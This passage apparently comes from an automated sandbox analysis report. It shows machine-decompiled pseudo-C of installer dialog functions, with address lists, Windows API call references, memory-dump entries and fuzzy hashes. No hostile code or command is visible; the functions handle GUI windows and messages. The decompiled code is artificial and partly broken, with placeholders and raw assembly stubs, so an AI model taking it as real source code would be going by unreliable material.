								_v44 = _t306;
								_v72 = _t286 & _t316;
								if((_t286 & 0x00000002) == 0) {
									if((_t286 & 0x00000004) == 0) {
										 *( *0x423740 + _t306 * 4) = SendMessageW(_v8, 0x1132, 0,  &_v88);
									} else {
										_v16 = SendMessageW(_v8, 0x110a, 3, _v16);
									}
								} else {
									_v80 = 0x4d;
									_v48 = 1;
									_t291 = SendMessageW(_v8, 0x1132, 0,  &_v88);
									_v32 = 1;
									 *( *0x423740 + _t306 * 4) = _t291;
									_v16 =  *( *0x423740 + _t306 * 4);
								}
							}
							_t306 = _t306 + 1;
							_t324 =  &(_v28[0x818]);
							_v28 = _t324;
						} while (_t306 <  *0x42a2ac);
						if(_v32 != 0) {
							L20:
							if(_v20 != 0) {
								E004044C7(_v8);
								_t298 = _v36;
								goto L23;
							} else {
								ShowWindow(_v12, 5);
								E004044C7(_v12);
								L93:
								return E004044F9(_a8, _a12, _a16);
							}
						}
						goto L19;
					}
				}
			}


























































              0x00404f1d
              0x00404f23
              0x00404f25
              0x00404f2b
              0x00404f31
              0x00404f47
              0x00404f4a
              0x00404f4d
              0x00405180
              0x00405187
              0x0040519b
              0x00405189
              0x0040518b
              0x0040518e
              0x0040518f
              0x00405196
              0x00405196
              0x004051a7
              0x004051b5
              0x004051b8
              0x004051ce
              0x00405246
              0x00405249
              0x0040524b
              0x00405255
              0x00405263
              0x00405263
              0x00405265
              0x0040526f
              0x00405275
              0x00405278
              0x00405293
              0x0040527a
              0x00405284
              0x00405284
              0x00405278
              0x0040526f
              0x00000000
              0x00405249
              0x004051d3
              0x004051de
              0x004051e3
              0x004051ea
              0x004051f1
              0x004051f4
              0x004051fc
              0x004051fc
              0x00405200
              0x00405204
              0x00405208
              0x0040521b
              0x0040520a
              0x0040520a
              0x00405211
              0x00405217
              0x00405213
              0x00405213
              0x00405213
              0x00405211
              0x00405221
              0x00405223
              0x0040522b
              0x00405233
              0x00405243
              0x00405243
              0x00405204
              0x00000000
              0x004051f4
              0x004051d5
              0x004051dc
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x00405296
              0x00405296
              0x0040529d
              0x0040530e
              0x00405315
              0x00405321
              0x00405321
              0x0040532a
              0x0040532c
              0x00405333
              0x00405336
              0x00405336
              0x0040533c
              0x00405343
              0x00405346
              0x00405346
              0x0040534c
              0x00405352
              0x00405358
              0x00405358
              0x00405365
              0x004054c5
              0x004054cc
              0x004054e9
              0x004054ef
              0x00405501
              0x00405501
              0x00000000
              0x0040536b
              0x0040536d
              0x00405372
              0x00405377
              0x0040537c
              0x0040537e
              0x0040537e
              0x0040537f
              0x00405380
              0x00405382
              0x00405382
              0x0040538a
              0x004053cb
              0x004053cd
              0x004053dd
              0x004053e0
              0x004053e5
              0x004053ec
              0x004053ef
              0x00405491
              0x00405499
              0x004054a1
              0x004054a1
              0x004054af
              0x004054c0
              0x004054c0
              0x00000000
              0x004054af
              0x004053f5
              0x004053f8
              0x004053fe
              0x00405403
              0x00405405
              0x00405407
              0x0040540d
              0x00405414
              0x00405419
              0x00405420
              0x00405423
              0x00405423
              0x0040542a
              0x00405436
              0x0040543a
              0x0040543c
              0x0040543c
              0x0040542c
              0x0040542e
              0x0040542e
              0x0040545c
              0x00405468
              0x00405477
              0x00405477
              0x00405479
              0x0040547c
              0x00405485
              0x00000000
              0x0040538c
              0x00405397
              0x0040539a
              0x0040539f
              0x004053a1
              0x004053a5
              0x004053b5
              0x004053bf
              0x004053c1
              0x004053c4
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x004053a7
              0x004053a7
              0x004053ad
              0x004053af
              0x004053af
              0x004053b0
              0x004053b1
              0x00000000
              0x004053a7
              0x0040538a
              0x00405365
              0x004052a5
              0x00000000
              0x004052bb
              0x004052c5
              0x004052ca
              0x00000000
              0x00000000
              0x004052dc
              0x004052e1
              0x004052ed
              0x004052ed
              0x004052ef
              0x004052fe
              0x00405300
              0x00405304
              0x00405307
              0x00000000
              0x00405307
              0x004052a5
              0x00404f53
              0x00404f58
              0x00404f62
              0x00404f63
              0x00404f6c
              0x00404f7b
              0x00404f86
              0x00404f8c
              0x00404f9a
              0x00404faf
              0x00404fb4
              0x00404fbf
              0x00404fc8
              0x00404fdd
              0x00404fee
              0x00404ffb
              0x00404ffb
              0x00405000
              0x00405006
              0x00405008
              0x0040500b
              0x00405010
              0x00405015
              0x00405017
              0x00405017
              0x00405037
              0x00405037
              0x00405039
              0x0040503a
              0x0040503f
              0x00405045
              0x00405049
              0x0040504e
              0x00405056
              0x0040505a
              0x0040505f
              0x00405064
              0x0040506c
              0x0040506f
              0x0040513f
              0x00405152
              0x00000000
              0x00405075
              0x00405078
              0x0040507b
              0x0040507e
              0x0040507e
              0x00405084
              0x0040508d
              0x00405090
              0x00405094
              0x00405097
              0x0040509a
              0x004050a3
              0x004050ac
              0x004050af
              0x004050b2
              0x004050b5
              0x004050f3
              0x0040511e
              0x004050f5
              0x00405104
              0x00405104
              0x004050b7
              0x004050ba
              0x004050c8
              0x004050d2
              0x004050da
              0x004050e1
              0x004050ec
              0x004050ec
              0x004050b5
              0x00405124
              0x00405125
              0x00405131
              0x00405131
              0x0040513d
              0x00405158
              0x0040515b
              0x00405178
              0x0040517d
              0x00000000
              0x0040515d
              0x00405162
              0x0040516b
              0x00405503
              0x00405515
              0x00405515
              0x0040515b
              0x00000000
              0x0040513d
              0x0040506f

              APIs
              • GetDlgItem.USER32 ref: 00404F16
              • GetDlgItem.USER32 ref: 00404F23
              • GlobalAlloc.KERNEL32(00000040,?), ref: 00404F6F
              • LoadImageW.USER32 ref: 00404F86
              • SetWindowLongW.USER32 ref: 00404FA0
              • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404FB4
              • ImageList_AddMasked.COMCTL32(00000000,00000110,00FF00FF), ref: 00404FC8
              • SendMessageW.USER32(?,00001109,00000002), ref: 00404FDD
              • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404FE9
              • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404FFB
              • DeleteObject.GDI32(00000110), ref: 00405000
              • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 0040502B
              • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00405037
              • SendMessageW.USER32(?,00001132,00000000,?), ref: 004050D2
              • SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 00405102
                • Part of subcall function 004044C7: SendMessageW.USER32(00000028,?,00000001,004042F2), ref: 004044D5
              • SendMessageW.USER32(?,00001132,00000000,?), ref: 00405116
              • GetWindowLongW.USER32(?,000000F0), ref: 00405144
              • SetWindowLongW.USER32 ref: 00405152
              • ShowWindow.USER32(?,00000005), ref: 00405162
              • SendMessageW.USER32(?,00000419,00000000,?), ref: 00405263
              • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 004052C5
              • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 004052DA
              • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 004052FE
              • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00405321
              • ImageList_Destroy.COMCTL32(?), ref: 00405336
              • GlobalFree.KERNEL32 ref: 00405346
              • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 004053BF
              • SendMessageW.USER32(?,00001102,?,?), ref: 00405468
              • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00405477
              • InvalidateRect.USER32(?,00000000,00000001), ref: 004054A1
              • ShowWindow.USER32(?,00000000), ref: 004054EF
              • GetDlgItem.USER32 ref: 004054FA
              • ShowWindow.USER32(00000000), ref: 00405501
              Strings
              Memory Dump Source
              • Source File: 00000001.00000002.665305559.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000001.00000002.665292449.0000000000400000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.665364092.0000000000408000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.665378913.000000000040A000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.665383681.000000000040C000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.665411947.0000000000414000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.665438070.0000000000427000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.665452320.0000000000435000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.665456458.0000000000437000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.665468957.000000000043B000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: MessageSend$Window$Image$ItemList_LongShow$Global$AllocCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
              • String ID: $M$N
              • API String ID: 2564846305-813528018
              • Opcode ID: 30c87aeda25f360d81773f0e2c70f123d365d9cc6a167c9b0a22042fa7f78e66
              • Instruction ID: 51cb895bf96748e94aa34dbd086816f234b0803d1cad36f3447be88a3ed44bf2
              • Opcode Fuzzy Hash: 30c87aeda25f360d81773f0e2c70f123d365d9cc6a167c9b0a22042fa7f78e66
              • Instruction Fuzzy Hash: 0C126970900609EFDF209FA5DC45AAE7BB5FB44314F10817AEA10BA2E1D7798A52CF58
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00403FB9, Relevance: 58.1, APIs: 32, Strings: 1, Instructions: 346windowstringCOMMON
              Download Yara Rule
              C-Code - Quality: 85%
              			E00403FB9(struct HWND__* _a4, signed int _a8, int _a12, long _a16) {
				struct HWND__* _v32;
				void* _v80;
				void* _v84;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t37;
				signed int _t39;
				signed int _t41;
				struct HWND__* _t51;
				signed int _t70;
				struct HWND__* _t76;
				signed int _t89;
				struct HWND__* _t94;
				signed int _t102;
				int _t106;
				signed int _t118;
				signed int _t119;
				int _t120;
				signed int _t125;
				struct HWND__* _t128;
				struct HWND__* _t129;
				int _t130;
				long _t133;
				int _t135;
				int _t136;
				void* _t137;

				_t118 = _a8;
				if(_t118 == 0x110 || _t118 == 0x408) {
					_t37 = _a12;
					_t128 = _a4;
					__eflags = _t118 - 0x110;
					 *0x423730 = _t37;
					if(_t118 == 0x110) {
						 *0x42a268 = _t128;
						 *0x423744 = GetDlgItem(_t128, 1);
						_t94 = GetDlgItem(_t128, 2);
						_push(0xffffffff);
						_push(0x1c);
						 *0x421710 = _t94;
						E00404492(_t128);
						SetClassLongW(_t128, 0xfffffff2,  *0x429248);
						 *0x42922c = E0040140B(4);
						_t37 = 1;
						__eflags = 1;
						 *0x423730 = 1;
					}
					_t125 =  *0x40a39c; // 0xffffffff
					_t136 = 0;
					_t133 = (_t125 << 6) +  *0x42a2a0;
					__eflags = _t125;
					if(_t125 < 0) {
						L34:
						E004044DE(0x40b);
						while(1) {
							_t39 =  *0x423730;
							 *0x40a39c =  *0x40a39c + _t39;
							_t133 = _t133 + (_t39 << 6);
							_t41 =  *0x40a39c; // 0xffffffff
							__eflags = _t41 -  *0x42a2a4;
							if(_t41 ==  *0x42a2a4) {
								E0040140B(1);
							}
							__eflags =  *0x42922c - _t136;
							if( *0x42922c != _t136) {
								break;
							}
							__eflags =  *0x40a39c -  *0x42a2a4; // 0xffffffff
							if(__eflags >= 0) {
								break;
							}
							_t119 =  *(_t133 + 0x14);
							E00406579(_t119, _t128, _t133, 0x43a000,  *((intOrPtr*)(_t133 + 0x24)));
							_push( *((intOrPtr*)(_t133 + 0x20)));
							_push(0xfffffc19);
							E00404492(_t128);
							_push( *((intOrPtr*)(_t133 + 0x1c)));
							_push(0xfffffc1b);
							E00404492(_t128);
							_push( *((intOrPtr*)(_t133 + 0x28)));
							_push(0xfffffc1a);
							E00404492(_t128);
							_t51 = GetDlgItem(_t128, 3);
							__eflags =  *0x42a30c - _t136;
							_v32 = _t51;
							if( *0x42a30c != _t136) {
								_t119 = _t119 & 0x0000fefd | 0x00000004;
								__eflags = _t119;
							}
							ShowWindow(_t51, _t119 & 0x00000008);
							EnableWindow( *(_t137 + 0x30), _t119 & 0x00000100);
							E004044B4(_t119 & 0x00000002);
							_t120 = _t119 & 0x00000004;
							EnableWindow( *0x421710, _t120);
							__eflags = _t120 - _t136;
							if(_t120 == _t136) {
								_push(1);
							} else {
								_push(_t136);
							}
							EnableMenuItem(GetSystemMenu(_t128, _t136), 0xf060, ??);
							SendMessageW( *(_t137 + 0x38), 0xf4, _t136, 1);
							__eflags =  *0x42a30c - _t136;
							if( *0x42a30c == _t136) {
								_push( *0x423744);
							} else {
								SendMessageW(_t128, 0x401, 2, _t136);
								_push( *0x421710);
							}
							E004044C7();
							E0040653C(0x423748, E00403F9A());
							E00406579(0x423748, _t128, _t133,  &(0x423748[lstrlenW(0x423748)]),  *((intOrPtr*)(_t133 + 0x18)));
							SetWindowTextW(_t128, 0x423748);
							_t70 = E00401389( *((intOrPtr*)(_t133 + 8)), _t136);
							__eflags = _t70;
							if(_t70 != 0) {
								continue;
							} else {
								__eflags =  *_t133 - _t136;
								if( *_t133 == _t136) {
									continue;
								}
								__eflags =  *(_t133 + 4) - 5;
								if( *(_t133 + 4) != 5) {
									DestroyWindow( *0x429238);
									 *0x422720 = _t133;
									__eflags =  *_t133 - _t136;
									if( *_t133 <= _t136) {
										goto L58;
									}
									_t76 = CreateDialogParamW( *0x42a260,  *_t133 +  *0x429240 & 0x0000ffff, _t128,  *(0x40a3a0 +  *(_t133 + 4) * 4), _t133);
									__eflags = _t76 - _t136;
									 *0x429238 = _t76;
									if(_t76 == _t136) {
										goto L58;
									}
									_push( *((intOrPtr*)(_t133 + 0x2c)));
									_push(6);
									E00404492(_t76);
									GetWindowRect(GetDlgItem(_t128, 0x3fa), _t137 + 0x10);
									ScreenToClient(_t128, _t137 + 0x10);
									SetWindowPos( *0x429238, _t136,  *(_t137 + 0x20),  *(_t137 + 0x20), _t136, _t136, 0x15);
									E00401389( *((intOrPtr*)(_t133 + 0xc)), _t136);
									__eflags =  *0x42922c - _t136;
									if( *0x42922c != _t136) {
										goto L61;
									}
									ShowWindow( *0x429238, 8);
									E004044DE(0x405);
									goto L58;
								}
								__eflags =  *0x42a30c - _t136;
								if( *0x42a30c != _t136) {
									goto L61;
								}
								__eflags =  *0x42a300 - _t136;
								if( *0x42a300 != _t136) {
									continue;
								}
								goto L61;
							}
						}
						DestroyWindow( *0x429238);
						 *0x42a268 = _t136;
						EndDialog(_t128,  *0x421f18);
						goto L58;
					} else {
						__eflags = _t37 - 1;
						if(_t37 != 1) {
							L33:
							__eflags =  *_t133 - _t136;
							if( *_t133 == _t136) {
								goto L61;
							}
							goto L34;
						}
						_t89 = E00401389( *((intOrPtr*)(_t133 + 0x10)), 0);
						__eflags = _t89;
						if(_t89 == 0) {
							goto L33;
						}
						SendMessageW( *0x429238, 0x40f, 0, 1);
						__eflags =  *0x42922c;
						return 0 |  *0x42922c == 0x00000000;
					}
				} else {
					_t128 = _a4;
					_t136 = 0;
					if(_t118 == 0x47) {
						SetWindowPos( *0x423728, _t128, 0, 0, 0, 0, 0x13);
					}
					if(_t118 == 5) {
						asm("sbb eax, eax");
						ShowWindow( *0x423728,  ~(_a12 - 1) & _t118);
					}
					if(_t118 != 0x40d) {
						__eflags = _t118 - 0x11;
						if(_t118 != 0x11) {
							__eflags = _t118 - 0x111;
							if(_t118 != 0x111) {
								L26:
								return E004044F9(_t118, _a12, _a16);
							}
							_t135 = _a12 & 0x0000ffff;
							_t129 = GetDlgItem(_t128, _t135);
							__eflags = _t129 - _t136;
							if(_t129 == _t136) {
								L13:
								__eflags = _t135 - 1;
								if(_t135 != 1) {
									__eflags = _t135 - 3;
									if(_t135 != 3) {
										_t130 = 2;
										__eflags = _t135 - _t130;
										if(_t135 != _t130) {
											L25:
											SendMessageW( *0x429238, 0x111, _a12, _a16);
											goto L26;
										}
										__eflags =  *0x42a30c - _t136;
										if( *0x42a30c == _t136) {
											_t102 = E0040140B(3);
											__eflags = _t102;
											if(_t102 != 0) {
												goto L26;
											}
											 *0x421f18 = 1;
											L21:
											_push(0x78);
											L22:
											E0040446B();
											goto L26;
										}
										E0040140B(_t130);
										 *0x421f18 = _t130;
										goto L21;
									}
									__eflags =  *0x40a39c - _t136; // 0xffffffff
									if(__eflags <= 0) {
										goto L25;
									}
									_push(0xffffffff);
									goto L22;
								}
								_push(_t135);
								goto L22;
							}
							SendMessageW(_t129, 0xf3, _t136, _t136);
							_t106 = IsWindowEnabled(_t129);
							__eflags = _t106;
							if(_t106 == 0) {
								goto L61;
							}
							goto L13;
						}
						SetWindowLongW(_t128, _t136, _t136);
						return 1;
					} else {
						DestroyWindow( *0x429238);
						 *0x429238 = _a12;
						L58:
						if( *0x425748 == _t136 &&  *0x429238 != _t136) {
							ShowWindow(_t128, 0xa);
							 *0x425748 = 1;
						}
						L61:
						return 0;
					}
				}
			}






























              0x00403fc2
              0x00403fcb
              0x0040410c
              0x00404110
              0x00404114
              0x00404116
              0x0040411b
              0x00404126
              0x00404131
              0x00404136
              0x00404138
              0x0040413a
              0x0040413d
              0x00404142
              0x00404150
              0x0040415d
              0x00404164
              0x00404164
              0x00404165
              0x00404165
              0x0040416a
              0x00404170
              0x00404177
              0x0040417d
              0x0040417f
              0x004041bf
              0x004041c4
              0x004041c9
              0x004041c9
              0x004041ce
              0x004041d7
              0x004041d9
              0x004041de
              0x004041e4
              0x004041e8
              0x004041e8
              0x004041ed
              0x004041f3
              0x00000000
              0x00000000
              0x004041fe
              0x00404204
              0x00000000
              0x00000000
              0x0040420d
              0x00404215
              0x0040421a
              0x0040421d
              0x00404223
              0x00404228
              0x0040422b
              0x00404231
              0x00404236
              0x00404239
              0x0040423f
              0x00404247
              0x0040424d
              0x00404253
              0x00404257
              0x0040425e
              0x0040425e
              0x0040425e
              0x00404268
              0x0040427a
              0x00404286
              0x0040428b
              0x00404295
              0x0040429b
              0x0040429d
              0x004042a2
              0x0040429f
              0x0040429f
              0x0040429f
              0x004042b2
              0x004042ca
              0x004042cc
              0x004042d2
              0x004042e7
              0x004042d4
              0x004042dd
              0x004042df
              0x004042df
              0x004042ed
              0x004042fe
              0x00404314
              0x0040431b
              0x00404325
              0x0040432a
              0x0040432c
              0x00000000
              0x00404332
              0x00404332
              0x00404334
              0x00000000
              0x00000000
              0x0040433a
              0x0040433e
              0x00404363
              0x00404369
              0x0040436f
              0x00404371
              0x00000000
              0x00000000
              0x00404397
              0x0040439d
              0x0040439f
              0x004043a4
              0x00000000
              0x00000000
              0x004043aa
              0x004043ad
              0x004043b0
              0x004043c7
              0x004043d3
              0x004043ec
              0x004043f6
              0x004043fb
              0x00404401
              0x00000000
              0x00000000
              0x0040440b
              0x00404416
              0x00000000
              0x00404416
              0x00404340
              0x00404346
              0x00000000
              0x00000000
              0x0040434c
              0x00404352
              0x00000000
              0x00000000
              0x00000000
              0x00404358
              0x0040432c
              0x00404423
              0x0040442f
              0x00404436
              0x00000000
              0x00404181
              0x00404181
              0x00404184
              0x004041b7
              0x004041b7
              0x004041b9
              0x00000000
              0x00000000
              0x00000000
              0x004041b9
              0x0040418a
              0x0040418f
              0x00404191
              0x00000000
              0x00000000
              0x004041a1
              0x004041a9
              0x00000000
              0x004041af
              0x00403fdd
              0x00403fdd
              0x00403fe1
              0x00403fe6
              0x00403ff5
              0x00403ff5
              0x00403ffe
              0x00404007
              0x00404012
              0x00404012
              0x0040401e
              0x0040403a
              0x0040403d
              0x00404050
              0x00404056
              0x004040f9
              0x00000000
              0x00404102
              0x0040405c
              0x00404069
              0x0040406b
              0x0040406d
              0x0040408c
              0x0040408c
              0x0040408f
              0x00404094
              0x00404097
              0x004040a7
              0x004040a8
              0x004040aa
              0x004040e0
              0x004040f3
              0x00000000
              0x004040f3
              0x004040ac
              0x004040b2
              0x004040cb
              0x004040d0
              0x004040d2
              0x00000000
              0x00000000
              0x004040d4
              0x004040c0
              0x004040c0
              0x004040c2
              0x004040c2
              0x00000000
              0x004040c2
              0x004040b5
              0x004040ba
              0x00000000
              0x004040ba
              0x00404099
              0x0040409f
              0x00000000
              0x00000000
              0x004040a1
              0x00000000
              0x004040a1
              0x00404091
              0x00000000
              0x00404091
              0x00404077
              0x0040407e
              0x00404084
              0x00404086
              0x00000000
              0x00000000
              0x00000000
              0x00404086
              0x00404042
              0x00000000
              0x00404020
              0x00404026
              0x00404030
              0x0040443c
              0x00404442
              0x0040444f
              0x00404455
              0x00404455
              0x0040445f
              0x00000000
              0x0040445f
              0x0040401e

              APIs
              • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403FF5
              • ShowWindow.USER32(?), ref: 00404012
              • DestroyWindow.USER32 ref: 00404026
              • SetWindowLongW.USER32 ref: 00404042
              • GetDlgItem.USER32 ref: 00404063
              • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00404077
              • IsWindowEnabled.USER32(00000000), ref: 0040407E
              • GetDlgItem.USER32 ref: 0040412C
              • GetDlgItem.USER32 ref: 00404136
              • SetClassLongW.USER32(?,000000F2,?), ref: 00404150
              • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 004041A1
              • GetDlgItem.USER32 ref: 00404247
              • ShowWindow.USER32(00000000,?), ref: 00404268
              • EnableWindow.USER32(?,?), ref: 0040427A
              • EnableWindow.USER32(?,?), ref: 00404295
              • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 004042AB
              • EnableMenuItem.USER32 ref: 004042B2
              • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 004042CA
              • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 004042DD
              • lstrlenW.KERNEL32(00423748,?,00423748,00000000), ref: 00404307
              • SetWindowTextW.USER32(?,00423748), ref: 0040431B
              • ShowWindow.USER32(?,0000000A), ref: 0040444F
              Strings
              Memory Dump Source
              • Source File: 00000001.00000002.665305559.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000001.00000002.665292449.0000000000400000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.665364092.0000000000408000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.665378913.000000000040A000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.665383681.000000000040C000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.665411947.0000000000414000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.665438070.0000000000427000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.665452320.0000000000435000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.665456458.0000000000437000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.665468957.000000000043B000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: Window$Item$MessageSend$EnableShow$LongMenu$ClassDestroyEnabledSystemTextlstrlen
              • String ID: H7B
              • API String ID: 184305955-2300413410
              • Opcode ID: ad2877bd5c4ea7cc256e3088b2b3c42cb38b7d734cc530d92285f8f03c2605ef
              • Instruction ID: 474293f91904d384e756f83d9200f154ec1a476d51ccc5c10f5d023ba508d08e
              • Opcode Fuzzy Hash: ad2877bd5c4ea7cc256e3088b2b3c42cb38b7d734cc530d92285f8f03c2605ef
              • Instruction Fuzzy Hash: 17C1B1B1600604FBCB216F61EE85E2A7BB8EB84705F40497EF741B51F1CB3958529B2E
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00404651, Relevance: 37.0, APIs: 19, Strings: 2, Instructions: 204windowstringCOMMON
              Download Yara Rule
              C-Code - Quality: 91%
              			E00404651(struct HWND__* _a4, int _a8, unsigned int _a12, WCHAR* _a16) {
				intOrPtr _v8;
				int _v12;
				void* _v16;
				struct HWND__* _t56;
				signed int _t75;
				signed short* _t76;
				signed short* _t78;
				long _t92;
				int _t103;
				signed int _t110;
				intOrPtr _t113;
				WCHAR* _t114;
				signed int* _t116;
				WCHAR* _t117;
				struct HWND__* _t118;

				if(_a8 != 0x110) {
					if(_a8 != 0x111) {
						L13:
						if(_a8 != 0x4e) {
							if(_a8 == 0x40b) {
								 *0x421714 =  *0x421714 + 1;
							}
							L27:
							_t114 = _a16;
							L28:
							return E004044F9(_a8, _a12, _t114);
						}
						_t56 = GetDlgItem(_a4, 0x3e8);
						_t114 = _a16;
						if( *((intOrPtr*)(_t114 + 8)) == 0x70b &&  *((intOrPtr*)(_t114 + 0xc)) == 0x201) {
							_t103 =  *((intOrPtr*)(_t114 + 0x1c));
							_t113 =  *((intOrPtr*)(_t114 + 0x18));
							_v12 = _t103;
							_v16 = _t113;
							_v8 = 0x428200;
							if(_t103 - _t113 < 0x800) {
								SendMessageW(_t56, 0x44b, 0,  &_v16);
								SetCursor(LoadCursorW(0, 0x7f02));
								_push(1);
								E00404900(_a4, _v8);
								SetCursor(LoadCursorW(0, 0x7f00));
								_t114 = _a16;
							}
						}
						if( *((intOrPtr*)(_t114 + 8)) != 0x700 ||  *((intOrPtr*)(_t114 + 0xc)) != 0x100) {
							goto L28;
						} else {
							if( *((intOrPtr*)(_t114 + 0x10)) == 0xd) {
								SendMessageW( *0x42a268, 0x111, 1, 0);
							}
							if( *((intOrPtr*)(_t114 + 0x10)) == 0x1b) {
								SendMessageW( *0x42a268, 0x10, 0, 0);
							}
							return 1;
						}
					}
					if(_a12 >> 0x10 != 0 ||  *0x421714 != 0) {
						goto L27;
					} else {
						_t116 =  *0x422720 + 0x14;
						if(( *_t116 & 0x00000020) == 0) {
							goto L27;
						}
						 *_t116 =  *_t116 & 0xfffffffe | SendMessageW(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001;
						E004044B4(SendMessageW(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001);
						E004048DC();
						goto L13;
					}
				}
				_t117 = _a16;
				_t75 =  *(_t117 + 0x30);
				if(_t75 < 0) {
					_t75 =  *( *0x42923c - 4 + _t75 * 4);
				}
				_t76 =  *0x42a2b8 + _t75 * 2;
				_t110 =  *_t76 & 0x0000ffff;
				_a8 = _t110;
				_t78 =  &(_t76[1]);
				_a16 = _t78;
				_v16 = _t78;
				_v12 = 0;
				_v8 = E00404602;
				if(_t110 != 2) {
					_v8 = E004045C8;
				}
				_push( *((intOrPtr*)(_t117 + 0x34)));
				_push(0x22);
				E00404492(_a4);
				_push( *((intOrPtr*)(_t117 + 0x38)));
				_push(0x23);
				E00404492(_a4);
				CheckDlgButton(_a4, (0 | ( !( *(_t117 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t117 + 0x14) & 0x00000001) == 0x00000000) + 0x40a, 1);
				E004044B4( !( *(_t117 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t117 + 0x14) & 0x00000001);
				_t118 = GetDlgItem(_a4, 0x3e8);
				E004044C7(_t118);
				SendMessageW(_t118, 0x45b, 1, 0);
				_t92 =  *( *0x42a274 + 0x68);
				if(_t92 < 0) {
					_t92 = GetSysColor( ~_t92);
				}
				SendMessageW(_t118, 0x443, 0, _t92);
				SendMessageW(_t118, 0x445, 0, 0x4010000);
				SendMessageW(_t118, 0x435, 0, lstrlenW(_a16));
				 *0x421714 = 0;
				SendMessageW(_t118, 0x449, _a8,  &_v16);
				 *0x421714 = 0;
				return 0;
			}


















              0x00404663
              0x00404790
              0x004047ed
              0x004047f1
              0x004048be
              0x004048c0
              0x004048c0
              0x004048c6
              0x004048c6
              0x004048c9
              0x00000000
              0x004048d0
              0x004047ff
              0x00404805
              0x0040480f
              0x0040481a
              0x0040481d
              0x00404820
              0x0040482b
              0x0040482e
              0x00404835
              0x00404842
              0x00404853
              0x00404859
              0x00404861
              0x0040486f
              0x00404875
              0x00404875
              0x00404835
              0x0040487f
              0x00000000
              0x0040488a
              0x0040488e
              0x0040489e
              0x0040489e
              0x004048a4
              0x004048b0
              0x004048b0
              0x00000000
              0x004048b4
              0x0040487f
              0x0040479b
              0x00000000
              0x004047ad
              0x004047b2
              0x004047b8
              0x00000000
              0x00000000
              0x004047e1
              0x004047e3
              0x004047e8
              0x00000000
              0x004047e8
              0x0040479b
              0x00404669
              0x0040466c
              0x00404671
              0x00404682
              0x00404682
              0x0040468a
              0x0040468d
              0x00404691
              0x00404694
              0x00404698
              0x0040469b
              0x0040469e
              0x004046a1
              0x004046a8
              0x004046aa
              0x004046aa
              0x004046b4
              0x004046c1
              0x004046cb
              0x004046d0
              0x004046d3
              0x004046d8
              0x004046ef
              0x004046f6
              0x00404709
              0x0040470c
              0x00404720
              0x00404727
              0x0040472c
              0x00404731
              0x00404731
              0x0040473f
              0x0040474d
              0x0040475f
              0x00404764
              0x00404774
              0x00404776
              0x00000000

              APIs
              • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 004046EF
              • GetDlgItem.USER32 ref: 00404703
              • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 00404720
              • GetSysColor.USER32(?), ref: 00404731
              • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 0040473F
              • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 0040474D
              • lstrlenW.KERNEL32(?), ref: 00404752
              • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 0040475F
              • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 00404774
              • GetDlgItem.USER32 ref: 004047CD
              • SendMessageW.USER32(00000000), ref: 004047D4
              • GetDlgItem.USER32 ref: 004047FF
              • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 00404842
              • LoadCursorW.USER32(00000000,00007F02), ref: 00404850
              • SetCursor.USER32(00000000), ref: 00404853
              • LoadCursorW.USER32(00000000,00007F00), ref: 0040486C
              • SetCursor.USER32(00000000), ref: 0040486F
              • SendMessageW.USER32(00000111,00000001,00000000), ref: 0040489E
              • SendMessageW.USER32(00000010,00000000,00000000), ref: 004048B0
              Strings
              Memory Dump Source
